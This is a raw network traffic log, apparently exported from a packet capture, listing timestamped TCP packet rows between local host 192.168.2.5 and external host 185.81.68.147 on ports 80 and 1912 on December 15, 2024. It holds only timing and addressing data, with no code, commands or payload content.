                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.063288927 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.064292908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.064660072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065334082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065347910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065397978 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.065424919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066478014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066534042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.066576958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.067545891 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.067769051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.068722010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.068815947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069022894 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069071054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.069912910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.070103884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.070581913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.071331024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.071417093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072196007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072273016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072465897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.072508097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073419094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073805094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.073848009 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074670076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074690104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.074734926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075875044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075894117 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.075964928 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.076936007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.076951027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078064919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078087091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078109026 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.078140974 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079251051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079268932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.079345942 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080384016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080398083 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.080477953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.081588030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.081661940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082191944 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082668066 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082766056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.082839012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.083846092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.084333897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.084408998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085083961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085098028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.085148096 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086230993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086251020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.086314917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087356091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087636948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.087688923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088550091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088570118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.088630915 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089718103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089737892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.089792967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.090931892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.090951920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.091876984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.091957092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.092175007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.092262983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.093182087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.093199968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.093239069 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.094327927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.094583035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.095417023 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.095447063 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.145629883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.226473093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.226840973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.226905107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.227049112 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.227355003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.227413893 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.228240013 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.228389025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.228447914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.229466915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.229487896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.229549885 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.230612040 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.230633020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.230689049 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.231705904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.232076883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.232139111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.232820034 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.233000994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.233184099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.234066010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.234148026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.234210014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.235325098 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.235373020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.235450029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.236419916 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.236443043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.236510038 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238415003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238493919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238554955 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238713980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238822937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.238892078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.239865065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.240012884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.240077972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.241091967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.241209984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.241267920 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.242175102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.242297888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.242357969 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.243329048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.243408918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.243469954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.244447947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.244569063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.244631052 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.245635033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.245793104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.245853901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.246792078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.246875048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.246932983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.247984886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.248074055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.248142004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.249217033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.249233007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.249294996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.250267029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.250380993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.250437021 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.251519918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.251540899 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.251612902 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.252612114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.252856970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.252918005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.253886938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.253906965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.253978968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.254877090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.255023003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.255340099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.256124020 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.256232977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.256289959 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.257240057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.257311106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.257375956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.258486032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.258508921 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.258574963 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.259562969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.259641886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.259799004 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.260768890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.260853052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.260925055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.261861086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.262017012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.262082100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.263093948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.263179064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.263251066 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.264230967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.264314890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.264380932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.265337944 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.265482903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.265547991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.266488075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.266664982 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.266727924 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.267755032 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.267839909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.268064022 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.268842936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.268981934 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.269052029 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.270001888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.270137072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.270201921 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.271146059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.271259069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.271425962 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.272322893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.272752047 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.272819996 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273566961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273590088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.273674965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274735928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274756908 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274827003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274885893 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274941921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.274955034 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275022030 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275073051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275094032 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275118113 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275141001 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275181055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275909901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.275969028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.276070118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.276983976 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.277144909 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.277211905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278117895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278222084 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.278311968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279369116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279633045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.279697895 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280560970 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280581951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.280648947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281687021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281707048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.281794071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282831907 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282906055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.282972097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.283938885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.284219027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.284295082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285202026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285223007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.285326958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286375999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286400080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.286480904 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.287664890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.333230972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.418906927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419059992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419145107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419389963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419555902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.419892073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.420948029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.420972109 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421042919 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421660900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421680927 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.421753883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.422801971 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423234940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423666954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423976898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.423993111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.424055099 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425143957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425164938 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.425220966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426305056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:17.426325083 CET8049708185.81.68.147192.168.2.5
